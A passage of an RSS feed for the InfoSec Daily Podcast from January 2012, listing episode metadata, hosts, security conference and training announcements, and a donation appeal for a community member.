	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go tohttp://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://news.techworld.com/security/3327502/murder-retrial-ordered-after-court-records-destroyed-by-virus/
A convicted murderer has been granted a retrial after a stenographer&#8217;s backup record of his trial was apparently destroyed by a malware infection.
	The possibly unique sequence of events came to a head when Randy Chaviano, 26, appealed against his 2009 conviction in a Florida court for shooting Charles Acosta during an alleged drug deal.
	When the Appeal Court discovered that almost no records[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 560 &#8211; An evening with Rob Fuller (@mubix)</title>
		<link>http://www.isdpodcast.com/episode-560-an-evening-with-rob-fuller-mubix</link>
		<comments>http://www.isdpodcast.com/episode-560-an-evening-with-rob-fuller-mubix#comments</comments>
		<pubDate>Fri, 06 Jan 2012 01:51:31 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3338</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 560 for January 5, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Themson Mester,, Karthik Rangarajan and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 560 for January 5, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Themson Mester,, Karthik Rangarajan and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NOVA Hackers Open House</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 9th, 2012 at 6:00PM</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ICF International, 9300 Lee Highway, Fairfax</span><br />
	<a href="http://maps.google.com/maps/ms?hl=en&amp;gl=us&amp;ptab=2&amp;ie=UTF8&amp;oe=UTF8&amp;msa=0&amp;msid=104405866946229741710.00048046ec622944cab00&amp;ll=38.871786,-77.265805&amp;spn=0.003968,0.006614&amp;t=h&amp;z=18"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://maps.google.com/maps/ms?hl=en&amp;gl=us&amp;ptab=2&amp;ie=UTF8&amp;oe=UTF8&amp;msa=0&amp;msid=104405866946229741710.00048046ec622944cab00&amp;ll=38.871786,-77.265805&amp;spn=0.003968,0.006614&amp;t=h&amp;z=18</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9 <br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 9-13 <br class="kix-line-break" /><br />
	Where: Bristol, UK</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11th, 2012, 9 AM to 4 PM</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium Griffin Hall, Northern Kentucky University</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A nice winter evening talk with Rob Fuller (@mubix). &nbsp;Rob is a Penetration Tester in Washington DC. He is a cast member of the video podcast Hak.5 and is very active in the open source community as a thought provoker, reviewer and sometimes even a coder. He has worked on projects like nUbuntu, Jasager, and the Hak5 USB Switchblade.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-560-an-evening-with-rob-fuller-mubix/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3338/0/infosec-daily-podcast-episode-560.mp3" length="19759374" type="audio/mpeg" />
		<itunes:duration>0:41:07</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 560 for January 5, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Themson Mester,, Karthik Rangarajan and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all k[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 560 for January 5, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Themson Mester,, Karthik Rangarajan and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	NOVA Hackers Open House
	When: January 9th, 2012 at 6:00PM
	Where: ICF International, 9300 Lee Highway, Fairfax
	http://maps.google.com/maps/ms?hl=en&#38;gl=us&#38;ptab=2&#38;ie=UTF8&#38;oe=UTF8&#38;msa=0&#38;msid=104405866946229741710.00048046ec622944cab00&#38;ll=38.871786,-77.265805&#38;spn=0.003968,0.006614&#38;t=h&#38;z=18
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC. 
	Social Engineering Training
	When: March 5-9 
	Where: Seattle, Washington
	When: April 9-13 
	Where: Bristol, UK
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Metasploit Framework Unleashed:
	When: February 11th, 2012, 9 AM to 4 PM
	Where: Digitorium Griffin Hall, Northern Kentucky University
	https://msfucincy.wordpress.com/
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	A nice winter evening talk with Rob Fuller (@mubix). &#160;Rob is a Penetration Tester in Washington DC. He is a cast member of the video podcast Hak.5 and is very active in the open source community as a thought provoker, reviewer and sometimes even a coder. He has worked on projects like nUbuntu, Jasager, and the Hak5 USB Switchblade.</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 559 &#8211; Pentest Lessons, Mobile Browsing, IE6, Anonymous, SQLi and हैकर की सेना</title>
		<link>http://www.isdpodcast.com/episode-559-pentest-lessons-mobile-browsing-ie6-anonymous-sqli-and-%e0%a4%b9%e0%a5%88%e0%a4%95%e0%a4%b0-%e0%a4%95%e0%a5%80-%e0%a4%b8%e0%a5%87%e0%a4%a8%e0%a4%be</link>
		<comments>http://www.isdpodcast.com/episode-559-pentest-lessons-mobile-browsing-ie6-anonymous-sqli-and-%e0%a4%b9%e0%a5%88%e0%a4%95%e0%a4%b0-%e0%a4%95%e0%a5%80-%e0%a4%b8%e0%a5%87%e0%a4%a8%e0%a4%be#comments</comments>
		<pubDate>Thu, 05 Jan 2012 01:55:16 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3331</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 559 for January 4, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Keith Pachulski. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 559 for January 4, 2012. &nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Keith Pachulski.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9 <br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 9-13 <br class="kix-line-break" /><br />
	Where: Bristol, UK</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
